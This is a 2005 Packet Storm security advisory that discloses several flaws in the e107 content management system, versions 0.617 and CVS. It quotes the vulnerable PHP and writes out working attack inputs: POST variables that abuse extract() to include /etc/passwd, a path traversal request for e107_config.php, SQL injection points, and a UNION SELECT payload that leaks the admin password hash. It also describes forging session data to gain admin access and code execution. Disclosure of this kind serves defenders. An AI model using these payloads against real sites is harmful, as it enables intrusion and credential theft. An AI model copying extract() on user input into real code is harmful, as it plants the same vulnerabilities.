e107617.txt

2005-07-13T00:00:00
ID PACKETSTORM:38638
Type packetstorm
Reporter Heintz
Modified 2005-07-13T00:00:00

Description

                                        
                                            `  
  
Software: http://www.e107.org  
Author: Heintz  
Advisory origin: http://www.waraxe.us  
Software bugtracker: http://e107.org/e107_plugins/bugtracker2/bugtracker2.php?0.bug.558  
  
e107 v 0.617  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
search.php line ~ 142  
if($_POST['searchquery']){  
echo "<div style='border:0;padding-right:2px;width:auto;height:400px;overflow:auto;'>";  
unset($text);  
extract($_POST);  
  
here extract() registeres and overwrites any variables in _POST array - this is worse than  
registered globals.  
  
few lines forward:  
if(file_exists($search_info[$key[$a]]['sfile'])){  
@require_once($search_info[$key[$a]]['sfile']);  
$ns -> tablerender(LAN_195." ".$search_info[$key[$a]]['qtype']." : ".LAN_196.": ".$results,   
  
$text);  
}  
  
so we need to POST following variables:  
searchquery=aaa  
search_info[0][sfile]=/etc/passwd  
searchtype[0]=0  
searchtype[1]=0  
  
  
lets look forward  
  
top.php line ~79  
sql queries before it has quotes around variable and those cant be braken out, but  
in this case there isnt need to send any quotes in variable:  
  
$replies = $sql2 -> db_Select("forum_t", "*", "thread_parent=$thread_id");  
  
top.php?[INJECTION].active.all.[INJECTION]  
though this requires mysql version to support subqueries, to have any use of this.  
  
lets look more:  
when downloads are handled/sent by php (this option turned on)  
  
request.php ~87  
  
send_file(e_FILE."public/".$download_url);  
  
when theres not "http://" or "ftp://" in file to be downloaded, then   
file is read and sent to user.  
  
request.php?../../e107_config.php  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
downloaded CVS and things are better but not enought,  
this advisory continues with CVS version of software.  
CVS is subject to change however.  
  
lets start with less dangerous features of software:  
  
e107_files/resetcore.php ~199  
  
if (isset($_POST['reset_core_sub']) && $_POST['mode'] == 1) {  
  
$a_name = preg_replace('/\\W/i', '', $_POST['a_name']);  
$a_password = preg_replace('/\\W/i', '', $_POST['a_password']);  
  
if (!$result = mysql_query("SELECT * FROM ".$mySQLprefix."user WHERE user_name='{$a_name}' AND   
  
user_password='{$a_password}' AND user_perms=0")) {  
exit;  
}  
  
if reset_core_sub and mode variables are set and sql query syntax is ok,  
note i sayd query *syntax* - no data needs to retrieved with query.  
then we get cms core configuration as a good info which we are going into.  
  
lets move on  
  
forum_viewforum.php ~196  
  
if($sql -> db_Select("forum_t", "*", "thread_forum_id='".$forum_id."' AND thread_parent='0'   
  
ORDER BY thread_s DESC, thread_lastpost DESC, thread_datestamp DESC LIMIT $from, $view")){  
  
forum_viewforum.php?5.[INJECTION]#  
  
lets go on  
  
request.php line ~120  
  
if ($type == "file")  
{  
$qry = "  
SELECT d.*, dc.download_category_class FROM #download as d  
LEFT JOIN #download_category AS dc ON dc.download_category_id = d.download_id  
WHERE d.download_id = $id;  
";  
  
request.php?1/**/UNION/**/SELECT/**/null,null,concat(user_password,0x687474703A2F2F00),null,null,  
  
null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHE  
  
RE/**/user_id=1  
  
will try to redirect your browser to <adminhash>http://  
in HTTP Location header.  
  
and on  
  
e107_handlers/upload_handler.php ~38  
  
  
if ($pref['upload_storagetype'] == "2" && $avatar == FALSE) {  
extract($_FILES);  
for($c = 0; $c <= 1; $c++)  
  
  
with enought knowlege about HTTP it would be possible to  
"rewrite" _FILES to load local file to db (not very useful i guess, but read on)  
  
  
extract() is able to rewrite _SESSION array, this is disasterous because this is  
one array that is almost always trusted to contain valid data.  
so we can enter admin hash and id to it and we are admin, and this leads to  
own php code execution - which makes things real nasty.  
  
Greets  
~~~~~~~  
slimjim100, fulvioo, Gotisch, KuerbY, legion and Torufoorum.  
Special greets go to Waraxe.  
`